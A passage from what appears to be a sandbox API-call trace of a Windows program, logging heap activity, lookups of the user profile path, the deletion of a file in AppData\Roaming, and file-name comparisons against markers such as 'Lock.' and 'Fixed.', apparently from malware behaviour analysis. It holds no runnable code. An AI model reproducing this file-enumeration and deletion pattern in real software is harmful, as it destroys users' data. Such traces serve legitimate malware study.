HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0200.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0200.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0200.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0200.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0200.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0200.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0200.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0200.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0200.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0200.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0200.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0200.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0200.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0200.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0200.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0200.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0200.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0200.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0200.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x74) returned 0x24f5278 [0200.065] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/jfoRUvp.mkv", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\jfoRUvp.mkv", lpFilePart=0x8bedfc*="jfoRUvp.mkv") returned 0x39 [0200.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f5278 | out: hHeap=0x25c0000) returned 1 [0200.066] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\jfoRUvp.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\jforuvp.mkv")) returned 0x2020 [0200.066] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\jfoRUvp.mkv", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x745540d0, ftCreationTime.dwHighDateTime=0x1d4cfed, ftLastAccessTime.dwLowDateTime=0x8e37ef60, ftLastAccessTime.dwHighDateTime=0x1d4cd82, ftLastWriteTime.dwLowDateTime=0x8e37ef60, ftLastWriteTime.dwHighDateTime=0x1d4cd82, nFileSizeHigh=0x0, nFileSizeLow=0x38ea, dwReserved0=0xc00, dwReserved1=0x4, cFileName="jfoRUvp.mkv", cAlternateFileName="")) returned 0xaa58e0 [0200.066] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\jfoRUvp.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\jforuvp.mkv")) returned 1 [0200.073] FindNextFileW (in: hFindFile=0xaa58e0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x745540d0, ftCreationTime.dwHighDateTime=0x1d4cfed, ftLastAccessTime.dwLowDateTime=0x8e37ef60, ftLastAccessTime.dwHighDateTime=0x1d4cd82, ftLastWriteTime.dwLowDateTime=0x8e37ef60, ftLastWriteTime.dwHighDateTime=0x1d4cd82, nFileSizeHigh=0x0, nFileSizeLow=0x38ea, dwReserved0=0xc00, dwReserved1=0x4, cFileName="jfoRUvp.mkv", cAlternateFileName="")) returned 0 [0200.073] FindClose (in: hFindFile=0xaa58e0 | out: hFindFile=0xaa58e0) returned 1 [0200.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0200.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0200.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0200.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0200.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0200.073] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0200.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0200.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0200.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0200.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0200.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0200.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0200.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0200.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0200.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0200.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0200.074] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0200.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0200.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0200.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa0e0 [0200.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0200.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0200.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa920 [0200.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0200.074] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0200.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0200.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0200.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0200.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0200.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0200.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0200.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0200.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0200.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0200.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0200.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0200.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0200.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0200.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0200.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0200.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0200.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0200.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0200.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0200.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0200.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0200.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0200.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0200.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0200.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0200.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0200.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0200.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0200.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0200.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0200.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0200.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0200.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0200.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0200.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0200.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0200.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0200.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x74) returned 0x24f5278 [0200.079] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/jfoRUvp.mkv", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\jfoRUvp.mkv", lpFilePart=0x8bf658*="jfoRUvp.mkv") returned 0x39 [0200.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f5278 | out: hHeap=0x25c0000) returned 1 [0200.080] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\jfoRUvp.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\jforuvp.mkv")) returned 0xffffffff [0200.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0200.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0200.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0200.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0200.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0200.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0200.080] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0200.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0200.080] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0200.080] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0200.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0200.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0200.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0200.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0200.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0200.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0200.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0200.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0200.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0200.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0200.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0200.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0200.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0200.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JLaCurEw.pdf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0200.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LaCurEw.pdf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0200.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aCurEw.pdf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0200.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CurEw.pdf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0200.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="urEw.pdf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0200.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rEw.pdf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0200.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ew.pdf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0200.081] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="w.pdf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0200.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0200.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0200.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0200.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0200.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0200.082] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0200.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0200.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0200.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0200.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0200.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0200.082] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JLaCurEw.pdf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0200.082] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LaCurEw.pdf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0200.082] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aCurEw.pdf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0200.082] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CurEw.pdf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0200.082] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="urEw.pdf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0200.082] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rEw.pdf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0200.082] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ew.pdf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0200.082] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0200.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0200.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0200.082] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0200.082] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0200.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0200.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0200.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa0e0 [0200.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0200.083] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0200.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0200.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0200.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1d0 [0200.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0200.083] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0200.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0200.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0200.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0200.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0200.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0200.083] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0200.083] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.083] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0200.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0200.084] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0200.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0200.084] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0200.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0200.084] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0200.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0200.084] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/JLaCurEw.pdf", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x52df5e90, ftCreationTime.dwHighDateTime=0x1d4c7dc, ftLastAccessTime.dwLowDateTime=0xdf24fe70, ftLastAccessTime.dwHighDateTime=0x1d4d22a, ftLastWriteTime.dwLowDateTime=0xdf24fe70, ftLastWriteTime.dwHighDateTime=0x1d4d22a, nFileSizeHigh=0x0, nFileSizeLow=0x1a51, dwReserved0=0xa880039, dwReserved1=0x16c81, cFileName="JLaCurEw.pdf", cAlternateFileName="")) returned 0xaa58e0 [0200.084] FindClose (in: hFindFile=0xaa58e0 | out: hFindFile=0xaa58e0) returned 1 [0200.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0200.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0200.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0200.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0200.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0200.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0200.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0200.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0200.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0200.085] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0200.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0200.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0200.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0200.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0200.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0200.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0200.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0200.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0200.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0200.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0200.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0200.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0200.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0200.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0200.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0200.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0200.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0200.089] RtlAllocateHeap 